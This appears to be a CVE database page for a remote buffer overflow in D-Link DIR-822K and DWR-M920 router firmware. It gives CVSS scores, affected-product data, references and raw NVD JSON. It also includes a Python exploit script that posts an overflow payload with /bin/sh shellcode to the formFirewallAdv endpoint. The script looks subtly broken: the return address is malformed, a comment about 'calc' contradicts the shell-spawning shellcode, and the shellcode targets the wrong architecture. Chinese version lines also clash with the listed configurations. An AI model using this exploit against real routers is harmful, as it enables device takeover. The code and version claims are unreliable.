CVE-2025-13548

Description

A vulnerability has been found in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. This vulnerability affects unknown code of the file /boafrm/formFirewallAdv. Such manipulation of the argument submit-url leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-822k_firmware:1.00_20250513164613:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dir-822k:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dwr-m920_firmware:1.1.50:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dwr-m920:b2:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DIR-822K (所有版本)

D-Link DWR-M920 1.00_20250513164613之前版本

D-Link DWR-M920 1.1.50之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://192.168.1.1'

# Buffer overflow payload for submit-url parameter
# EIP offset: 1024 bytes (adjust based on firmware version)
offset = 1024
# Return address (adjust for specific firmware)
ret_addr = b'\x41414141'
# NOP sled + shellcode (execute calc for demonstration)
nop_sled = b'\x90' * 100
# Simple shellcode - spawn shell
shellcode = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'

payload = b'A' * offset + ret_addr + nop_sled + shellcode

# Send exploit request
data = {
    'submit-url': payload.decode('latin-1'),
    'submit-button': 'save'
}

try:
    response = requests.post(f'{target}/boafrm/formFirewallAdv', data=data, timeout=5)
    print(f'[+] Exploit sent to {target}')
    print(f'[+] Payload length: {len(payload)} bytes')
except requests.exceptions.RequestException as e:
    print(f'[-] Error: {e}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13548
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13548
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13548/
[4] VulDB https://vuldb.com/cve/CVE-2025-13548
[5] https://github.com/QIU-DIE/CVE/issues/31
[6] https://github.com/QIU-DIE/CVE/issues/43
[7] https://vuldb.com/?ctiid.333315
[8] https://vuldb.com/?id.333315
[9] https://vuldb.com/?submit.693767
[10] https://vuldb.com/?submit.695433
[11] https://www.dlink.com/
[12] https://github.com/QIU-DIE/CVE/issues/31
[13] https://github.com/QIU-DIE/CVE/issues/43

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13548", "sourceIdentifier": "[email protected]", "published": "2025-11-23T12:15:45.770", "lastModified": "2025-12-02T03:32:26.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. This vulnerability affects unknown code of the file /boafrm/formFirewallAdv. Such manipulation of the argument submit-url leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-822k_firmware:1.00_20250513164613:*:*:*:*:*:*:*", "matchCriteriaId": "52F1E054-875F-45D6-AA5A-48ADA247E7E6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-822k:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC2A08EF-B518-4E83-9B1D-178E70CC8584"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dwr-m920_firmware:1.1.50:*:*:*:*:*:*:*", "matchCriteriaId": "2C932664-064A-41BC-92E2-174EB65427C6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dwr-m920:b2:*:*:*:*:*:*:*", "matchCriteriaId": "1FA1FA30-710E-4C9F-AE23-793213FE0220"}]}]}], "references": [{"url": "https://github.com/QIU-DIE/CVE/issues/31", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/QIU-DIE/CVE/issues/43", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.333315", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333315", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.693767", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.695433", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tag ... (truncated)